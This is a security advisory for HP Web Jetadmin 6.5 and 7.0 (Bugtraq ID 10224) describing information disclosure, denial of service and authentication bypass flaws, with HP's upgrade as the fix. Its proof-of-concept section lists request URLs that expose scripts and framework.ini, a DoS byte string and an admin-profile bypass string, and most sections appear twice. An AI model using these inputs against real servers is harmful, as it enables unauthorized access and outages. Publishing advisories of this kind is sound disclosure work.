HP Web Jetadmin Multiple Vulnerabilities
BID:10224
Info
HP Web Jetadmin Multiple Vulnerabilities
| Bugtraq ID: | 10224 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 27 2004 12:00AM |
| Updated: | Apr 27 2004 12:00AM |
| Credit: | Discovery is credited to Phenoelit <http://www.phenoelit.de>. |
| Vulnerable: |
HP Web Jetadmin 7.0 HP Web Jetadmin 6.5 |
| Not Vulnerable: |
HP Web Jetadmin 7.5 |
Discussion
HP Web Jetadmin Multiple Vulnerabilities
Multiple vulnerabilities have been identified in the application that may allow remote attackers to disclose sensitive information, carry out denial of service attacks, and gain unauthorized access to a vulnerable server.
These issues are reported to affect HP Web JetAdmin 6.5 and prior, however, version 7.0 may be affected by most of these issues as well.
Multiple vulnerabilities have been identified in the application that may allow remote attackers to disclose sensitive information, carry out denial of service attacks, and gain unauthorized access to a vulnerable server.
These issues are reported to affect HP Web JetAdmin 6.5 and prior, however, version 7.0 may be affected by most of these issues as well.
Exploit / POC
HP Web Jetadmin Multiple Vulnerabilities
The following proof of concept examples have been supplied:
Disclosure of scripts:
http://www.example.com:8000/plugins/hpjwja/script/devices_list.hts.
framework.ini file disclosure:
http://www.example.com:8000/plugins/framework/framework.ini
Denial of service:
01010101FFFF02020202020202020202
Bypassing authentication to access various functions:
obj=Httpd:SetProfile(Profiles_Admin,password,$_pwd,$__framework_ini)
An exploit to gain root or SYSTEM access to a vulnerable server has been provided:
The following proof of concept examples have been supplied:
Disclosure of scripts:
http://www.example.com:8000/plugins/hpjwja/script/devices_list.hts.
framework.ini file disclosure:
http://www.example.com:8000/plugins/framework/framework.ini
Denial of service:
01010101FFFF02020202020202020202
Bypassing authentication to access various functions:
obj=Httpd:SetProfile(Profiles_Admin,password,$_pwd,$__framework_ini)
An exploit to gain root or SYSTEM access to a vulnerable server has been provided:
Solution / Fix
HP Web Jetadmin Multiple Vulnerabilities
Solution:
HP has released security advisory SSRT2397 along with an upgrade dealing with this issue. Please se the referenced web advisory for more information on obtaining the upgrade.
Solution:
HP has released security advisory SSRT2397 along with an upgrade dealing with this issue. Please se the referenced web advisory for more information on obtaining the upgrade.
References
HP Web Jetadmin Multiple Vulnerabilities
References:
References: